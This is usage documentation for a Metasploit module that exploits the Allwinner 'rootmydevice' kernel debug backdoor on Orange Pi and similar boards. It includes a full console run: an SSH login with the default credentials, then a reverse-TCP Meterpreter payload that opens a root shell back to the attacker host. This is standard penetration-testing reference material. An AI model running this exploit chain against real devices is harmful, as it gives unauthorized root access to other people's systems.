## Vulnerable Application

Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.

Vulnerable OS:

* all OS images available for Orange Pis
* any for FriendlyARM's NanoPi M1
* SinoVoip's M2+ and M3
* Cuebietech's Cubietruck +
* Linksprite's pcDuino8 Uno

Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.

This module attempts to exploit a debug backdoor privilege escalation in
Allwinner SoC based devices. Implements the Allwinner privilege escalation
as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).
It is a simple debug kernel module that, when "rootmydevice" is echoed to
the process, it escalates the shell to root.


## Verification Steps

To use this module, you need a vulnerable device.

An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.

1. Start `msfconsole`
1. Get a session
1. Do: `use exploit/multi/local/allwinner_backdoor`
1. Do: `set SESSION [SESSION]`
1. Do: `set LHOST [LHOST]`
1. Do: `run`
1. You should get a new *root* session


## Options


## Scenarios

### Orange PI running Ubuntu 14.04 (Linux 3.4.39)

- `use auxiliary/scanner/ssh/ssh_login`

```
msf auxiliary(ssh_login) > set username orangepi
username => orangepi
msf auxiliary(ssh_login) > set password orangepi
password => orangepi
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
rhosts => 192.168.2.21
msf auxiliary(ssh_login) > exploit

[*] 192.168.2.21:22 SSH - Starting bruteforce
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio)
Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

- `use exploit/multi/local/allwinner_backdoor`

```
msf exploit(allwinner_backdoor) > set verbose true
verbose => true
msf exploit(allwinner_backdoor) > set session 1
session => 1
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
payload => linux/armle/meterpreter/reverse_tcp
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(allwinner_backdoor) > check
[*]  The target appears to be vulnerable.
msf exploit(allwinner_backdoor) > exploit
```

Successful exploitation:

```
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[+] Backdoor Found, writing payload to /tmp/odzVx.elf
[*] Max line length is 65537
[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[+] Escalating
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.2.248
OS           : Ubuntu 14.04 (Linux 3.4.39)
Architecture : armv7l
Meterpreter  : armle/linux
```
